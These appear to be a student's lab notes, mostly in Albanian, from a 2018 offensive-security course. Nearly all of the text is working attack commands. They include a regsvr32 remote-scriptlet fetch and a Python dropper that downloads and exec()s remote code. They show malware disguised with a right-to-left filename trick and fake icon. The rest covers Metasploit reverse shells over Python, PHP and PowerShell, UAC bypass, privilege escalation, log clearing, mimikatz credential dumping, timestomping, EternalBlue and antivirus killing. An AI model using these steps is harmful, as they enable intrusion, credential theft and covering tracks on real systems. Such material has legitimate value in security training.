rdesktop -g 1280x1024 172.16.50.96
=== || === || === || === || === || === ||
|| 03.12.2018 java 3-te ne cyber ||
=== || === || === || === || === || === ||
OSF forensics - tool per forensics
=== || === || === || === || === || === ||
|| 05.12.2018 ||
=== || === || === || === || === || === ||
sjam kon
=== || === || === || === || === || === ||
|| 07.12.2018 ||
=== || === || === || === || === || === ||
sjam kon
=== || === || === || === || === || === ||
|| 10.12.2018 ||
=== || === || === || === || === || === ||
me setup malware reverse per:
regsvr32 /s /n /u /i:http://172.16.65.141:8080/.sct scrobj.dll
task schedule
run persistence (ne metasploit)
me kriju malware ne GO platform apo gjuhe
right to left unicode
jpg to ico #online convert
change file icon with malware icon file created
installing python in windows:
download .exe or .msi
install
setup variables in windows:
ne system properties,
advanced, enviroment variables
system variables, path(;C:\Python27)
install pip:
cd C:\Python27\Scripts
pip.exe install pyinstaller | dir | check if pip.exe install pyinstaller is there
setup variables in windows:
ne system properties,
advanced, enviroment variables
system variables, edit variable value: ;C:\Python27\;C:\Python27\Scripts
cd C:\Users\Lab\Desktop
pyinstaller --onefile mlw.py --icon img.ico
copy right to left symbol from character map
rename mlw.exe to mlwgnp.exe than paste character in front of png.exe #e ktehn ne mlwexe.png
C:/python2.7\Tools\scripts> --ico
msf > use exploit/multi/script/web_delivery
>show targets
> set target 0
> set payload python/meterpreter/reverese_tcp
> set lhost 172.16.65.141
> set uripath /
> exploit
te nje terminal i ri
../ #to execute
na jep session :)
edito mlw.py
import sys
import urllib2
r=urllib2.urlopen("http://172.16.60.99:8080/")
exec(r.read())
me transferu ne windows: python -m SimpleHTTPServer 80
C:>python mlw.py #te jep session
##now compile to exe
c:>pyinstaller --onefile mlw.py
wget http://172.16.60.99:8080
echo "paste content of index.html | base64 -d
copy content of script found
nano mlw2.py / paste script here
python mlw2.py / te jep session
cp to /var/www
copy to windows
pyinstaller --onefile mlw2.py #from location where file is downloaded
cd dist
mlw2.exe #to execute ##error kur execute ne windows, script problem
fuser -k 80/tcp
msf > use exploit/multi/script/web_delivery
>show targets
> set target 3
> set lhost 172.16.65.141
> set uripath /
> set payload windows/meterpreter/reverse_tcp
> exploit
sessions
sessionons -i
getuid
run persistence --help
> use exploit/multi/handler
=== || === || === || === || === || === ||
12.12.2018 ||
=== || === || === || === || === || === ||
## me marr session me metasploit permes PHP
use multi/script/web_delivery
show targets
set target 1
set lhost xx
set payload php/meterpreter/reverse_tcp
set uripath /
exploit ##generate some output string
ne new terminal execute
php -d "script"
te vjen sessioni :)
##debug qa po ndodh
**single stage attack
nano info.txt
paste script
wget http://172.16.50.161:8080/
cat index.html
mv index.html index.php
firefox http://127.0.0.1/
te vjen session :)
session -i
sessions -k 2
==============================
## me marr session me metasploit permes PSH
set target 2
show options
set payload windows/meterpreter/reverse_tcp
show option
jobs -k
exploit /e gjeneron nje link
nano file / paste the link
nano index.html /paste the url
browse 172.16.50.161 /copy the link
ne cmd paste the link
:) te jep session
sessions -i x
getuid
>run post/windoes/manage/enable_rdp
>run post/windoes/manage/ meny options
========================================
##payload_inject ## nje session existues e duplifikon
> use exploit multi/handler
> set payload windows/meterpreter/reverse_tcp
> set lport xx
> set lhost xx
> exploit -j #silent
meterpreter> background
> run post/windows/manage/payload_inject
> set payload windows/meterpreter/reverse_tcp
> set lport xx
> set lhost xx
> set session x
> exploit
:) e duplikon session
meterpreter> getuid
meterpreter> shell
meterpreter> background
> user exploit/windows/local/bypassuac
> set session 1
> exploit
> set lport xx
> show advanced
> exploit
:) te jep session
meterpreter> getuid
meterpreter> getsystem
meterpreter> getuid
meterpreter>show_mount
meterpreter> ps #process liste
##clearing the logs and important of logs
meterpreter> clearev #clear logs
## me lexu ne memory, read live credentials
meterpreter> kiwi ## explore the tool, similar mimikatz
meterpreter> lsa_dump_sam
meterpreter> load mimikatz
## important of time file used and file time modified
meterpreter>timwstomp nc.exe ##find files recently accessed, it modified the time used
**siem analyze
**malware analyses
**behavior analyses
## ask injection
meterpreter>
> user exploit/win/local/ask
>set lhost
>set lport
>exploit
meterpreter> getuid
meterpreter> getsystem
>exploit
========================================
##Unicorn.py
python unicorn.py windows/meterpreter/reverse_tcp 172.16.59.161 666 macro
msfconsole -r unicorn.rc
cat powershell_attack.txt
=== || === || === || === || === || === ||
|| 14.12.2018 ||
=== || === || === || === || === || === ||
## malware of the future
## AI
## polymorphic malware, to read during holiday
## autorun script
resource ## me lexu prej nje file ne msfconsole
eternalblue
use exploit/windows/smb/ms17_010_eternalblue
set payload/windows/x64/meterpreter/reverse_tcp
set rhost IP
set lport port
use exploit/multi/handler
set ExitOnSession false
set PAYLOAD windows/meterpreter/reverse_tcp
set EXITFUNC thread
set LHOST localhost
set LPORT 4445
set AutoRunScript post/windows/manage/killav
exploit -j
msf > use exploit/multi/script/web_delivery
> set TARGET 3
> set PAYLOAD windows/meterpreter/reverse_tcp
> set LHOST
> show options
> exploit
session -c "command"
session -c "whoami"